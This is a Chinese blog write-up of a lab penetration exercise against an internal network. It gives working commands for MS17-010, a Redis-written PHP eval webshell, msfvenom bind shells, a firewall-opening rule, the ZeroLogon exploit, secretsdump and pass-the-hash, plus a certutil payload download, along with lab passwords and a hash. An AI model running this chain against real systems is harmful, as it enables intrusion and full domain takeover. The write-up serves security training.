靶机渗透日记-内网

在这里插入图片描述

  • WEB
    • win7/admin
  • 域成员
    • win2016/Admin#123
  • 域控
    • administrator/Admin@666

流程

  1. IP探测
    在这里插入图片描述

  2. 端口扫描

    在这里插入图片描述

  3. Win7系统,并且开放了139,445端口,尝试MS17-010

    在这里插入图片描述

    返回 system 权限

  4. 还有一种思路就是利用80端口的通达OA系统

    在这里插入图片描述

    使用工具上传一句话木马,使用蚁剑连接GETSHELL

    在这里插入图片描述

  5. 信息收集,发现WEB服务器存在双网卡

    在这里插入图片描述

  6. 添加路由信息

    run post/multi/manage/autoroute
    

    主机探测,这里使用UDP没有探测到,需要使用ARP探测

    use post/windows/gather/arp_scanner
    

    在这里插入图片描述

    得到 10.0.20.99 主机,对其进行端口扫描,开放了80,6379端口

    在这里插入图片描述

  7. 访问 80 端口

    在这里插入图片描述

    目录扫描

    在这里插入图片描述

    访问 l.php 可以发现是php探针,得到网站的绝对路径

    在这里插入图片描述

  8. 目标靶机还开放了6379端口,存在未授权访问

     proxychains4 redis-cli -h 10.0.20.99
    

    在这里插入图片描述

    写入一句话

    config set dir "C:/phpStudy/PHPTutorial/WWW/"
    config set dbfilename tx.php
    set 1 "<?php @eval($_POST['tx']);?>"
    save
    

    在这里插入图片描述

  9. 上线MSF,生成payload

    msfvenom -p windows/x64/meterpreter/bind_tcp  lport=4455 -f exe > 1.exe
    

    通过蚁剑上传到目标主机

    netsh advfirewall firewall add rule name="bind_tcp" protocol=TCP dir=in localport=4455action=allow
    

    在这里插入图片描述

    在这里插入图片描述

    发现同样存在两个网段,10.0.20.99以及10.0.10.111;还有域环境

  10. 域信息收集

    域用户

    在这里插入图片描述

    域管理员

    在这里插入图片描述

    域成员主机

    在这里插入图片描述

    域控计算机

    在这里插入图片描述

    域控IP地址为 10.0.10.110

    在这里插入图片描述

  11. 使用cve-2020-1472

    git clone https://github.com/SecureAuthCorp/impacket
    cd impacket
    python3 -m pip install -r requirements.txt
    python3 -m pip install .
    
    https://github.com/dirkjanm/CVE-2020-1472.git
    cd CVE-2020-1472
    python3 -m pip install -r requirements.txt
    proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
    

    在这里插入图片描述

    获取管理员HASH

    proxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -no-pass
    

    在这里插入图片描述

    通过 smbexec.py 连接

    proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
    

    在这里插入图片描述

  12. 上线MSF

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4456 -f exe > 2.exe
    

    下载 payload

    certutil -urlcache -split -f http://10.0.10.111/2.exe c:\1.exe
    

    在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值